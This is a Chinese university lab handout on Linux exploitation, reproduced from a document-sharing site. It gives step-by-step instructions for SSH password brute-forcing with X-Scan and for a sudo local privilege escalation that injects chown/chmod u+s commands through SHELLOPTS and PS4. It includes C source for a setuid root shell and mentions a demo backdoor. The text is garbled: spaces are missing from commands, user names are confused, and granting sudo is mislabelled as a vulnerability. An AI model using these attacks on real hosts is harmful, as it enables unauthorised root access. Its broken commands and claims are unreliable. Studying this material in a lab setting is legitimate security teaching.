实验6 Linux漏洞利用.docx
- 文档编号:2437818
- 上传时间:2022-10-29
- 格式:DOCX
- 页数:15
- 大小:182.81KB
实验6 Linux漏洞利用.docx
《实验6 Linux漏洞利用.docx》由会员分享,可在线阅读,更多相关《实验6 Linux漏洞利用.docx(15页珍藏版)》请在冰豆网上搜索。
实验6Linux漏洞利用
Linux漏洞利用(CVE-2005-2959、CVE-2006-2451)(SEC-L05-001.1)
Linux操作系统是一款开源的类UNIX操作系统,有多种发行版(Distributions),如RedHatLinux、SUSELinux、DebianLinux等等等等。
这些发行版在系统安装、包管理、桌面应用等方面各有特色,但是其操作系统内核(Kernel)均来自于一个组织(www.kernel.org),该组织负责Linux内核的更新、发布。
在部分已发布的内核版本中,存在一些严重影响操作系统安全的漏洞,Hacker或Cracker通过利用这些漏洞达到入侵并控制目标主机的目的,Cracker甚至会通过这些漏洞入侵有问题的主机及该主机所在网络,以达到窃取保密信息、散播蠕虫木马、发起DDOS攻击等目的。
实验目的
通过2种不同漏洞的利用(内核调用漏洞及系统工具漏洞),对普通帐号进行本地提权,通过实际操作增加实验者对网络安全及主机操作系统安全的认识,对希望成为合格的SA(SystemAdministrator&SecurityAdministrator)的实验者进行系统漏洞类的部分基础知识介绍。
实验准备
●熟悉了解相关的实验工具,掌握Putty,PuttySFTP,X-Scan等工具的使用,操作
下载实验中使用的工具:
Putty(putty.exe)及PuttySFTP工具(psftp.exe)、SSH口令在线扫描工具X-Scan、演示后门程序ndoor。
【说明】
putty.exe
一个小巧实用的远程登录客户端,支持多种协议。
psftp.exe
Putty工具集中的一个支持SFTP协议的客户端,用于通过SFTP协议上传下载文件。
x-scan
一款免费的网络扫描器,我们使用它的在线SSH口令扫描功能。
ndoor
用于演示的一个简单后门。
实验步骤
远程SSH服务口令暴力破解
步骤说明:
了解使用X-Scan扫描工具,探测被攻击服务器的SSH服务,实现口令自动猜测攻击
准备两台电脑,一台是linux,一台是winxp,两台电脑设置在同一网段中。
在linux建立两个帐户tester和test:
#addusertester因为字典文件里ssh_user.dic里有这个用户名
#passwdtester//密码设置为123因为字典文件里ssh_pass.dic里有这个密码
#addusertest因为字典文件里ssh_user.dic里有这个用户名
#passwdtest//密码设置为test因为字典文件里ssh_pass.dic里有这个密码
Xp电脑:
1.运行xscan_gui.exe启动X-Scan程序。
2.选择菜单设置->扫描参数,弹出参数设置窗口,左侧选中检测范围选项,在右侧的“指定IP范围”下的文本框中输入目标主机IP地址,如:
图1
图1
3.点开左侧的全局设置,进一步设置参数,选中左侧的“扫描模块”,在右侧仅选中SSH弱口令,如:
图2
图2
4.为了加快扫描速度,适当增加扫描线程数,点击左侧的“并发扫描”,在右侧的ListBox中将ssh的扫描线程数修改为30全局设置,如:
图3
图3
5.点击左侧的“其他设置”,在右侧中仅选中“无条件扫描”,如:
图4
图4
6.点开左侧的插件设置,选中“端口相关设置”,在右侧的“待检测端口”下的文本框中输入SSH服务的默认端口号22,如:
图5
图5
7.选中左侧的“字典文件设置”,双击右侧的“SSH密码字典”及“SSH用户名字典”,分别设置为ssh_pass.dic及ssh_user.dic,最后点击“确定”关闭参数设置窗口,如图6
图6
8.点击绿色右三角图标开始扫描,扫描完成后,如:
图7
图7
9.扫描完成后会自动打开系统默认浏览器显示扫描结果,在X-Scan工具主窗口也可以看到相应结果,在左侧窗口中“/”前面是用户名,后面是密码;在“安全漏洞及解决方案”列中,“/”前面是用户名,后面是密码,如:
图8
图8
通过上面的扫描,获得tester用户的密码是123,test用户的密码是test
Linux本地提权2:
利用系统工具漏洞(sudo)
步骤说明:
通过利用系统工具漏洞进行Linux本地帐户提权,以另外的方式再次实现对本地用户提权进行实现。
环境设置:
一台是linux,一台是winxp,两台电脑设置在同一网段中。
一台为192.168.100.100(linux),一台为192.168.100.101(winxp);在xp的电脑上安装putty.
第一步:
先制作一个sudo漏洞:
(把用户自动加入到sudo用户列表中)
运行xp上putty,输入linux服务器地址,用超级帐户登录到linux服务器上:
#useraddwpf
#passwdwpf//添加一个wpf帐户
# whereissudoers 先查找一下sudoers文件存放在哪里。
系统一般会返回如下内容:
sudoers:
/etc/sudoers/usr/share/man/man5/sudoers.5.gz
sudoers文件默认是只读的,所以要先修改一下它的权限:
#chmodu+w/etc/sudoers
使用vi修改sudoers文件
#vi/etc/sudoers
找到如下这行:
rootALL=(ALL)ALL
如果你的用户名是test,那么在上面这行的下面增加如下内容:
wpfALL=(ALL)ALL
从vi中保存退出,再将sudeors文件的权限修改回来:
chmodu-w/etc/sudoers
这样就完成了把新增加的用户wpf加入到sudo用户列表中,形成了sudo漏洞。
第二步:
1.用第一步建立的账户wpf(对此帐户进行提权)通过putty登录远程linux主机,如:
图14、图15
图14
图15
2.切换到cshell,如:
图16
命令格式:
[test@LT-courseware-0007~]$csh
图16
3.创建辅助脚本及提权源代码,如:
图17
命令格式:
[test@LT-courseware-0007~]$cat>ex.sh<<_EOF
辅助脚本代码内容如下:
#!
/bin/bash-x
echo
命令格式:
[test@LT-courseware-0007~]$cat>ex.c<<_EOF
帐户提权代码内容如下:
#include
intmain(void){
setuid(0);
system(“/bin/sh”);
return(0);
}
图17
4.准备辅助脚本,编译提权代码,如:
图18
a).为辅助脚本ex.sh文件添加执行权限
命令格式:
[test@LT-courseware-0007~]$chmodu+xex.sh
b).编译提权源代码文件
命令格式:
[test@LT-courseware-0007~]$gcc-oexex.c
c).查看文件属性,ex.sh脚本具有了执行权限,ex可执行程序的属主为test,组也为test
命令格式:
[test@LT-courseware-0007~]$ls-alex.sh
[test@LT-courseware-0007~]$ls-alex
图18
5.设置环境变量,利用sudo的漏洞改变ex可执行程序的属主和组,同时为其设置suid,我们可以看到,ex可执行程序的属主改变为root,
组也改变为root,同时设置了s位,如:
图19
命令格式:
[test@LT-courseware-0007~]$setenvSHELLOPTSxtrace
[test@LT-courseware-0007~]$setenvPS4'$(chownroot:
rootex;chmodu+sex)'
[test@LT-courseware-0007~]$sudo./ex.sh
查看提权文件ex的文件属性,ex可执行程序的属主改变为root,组也改变为root,同时设置了s位
命令格式:
[test@LT-courseware-0007~]$ls-alex
图19
注:
若执行“sudo./ex.sh”后提示输入密码,则输入wpf账户的密码,就会显示echo。
6.执行./ex进行提权,我们可以看到,当前的uid已经是0了,即获得了rootshell,如:
图20
命令格式:
[test@LT-courseware-0007~]$./ex
图20
在出现的sh-3.00#后输入id,显示提权成功。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 实验6 Linux漏洞利用 实验 Linux 漏洞 利用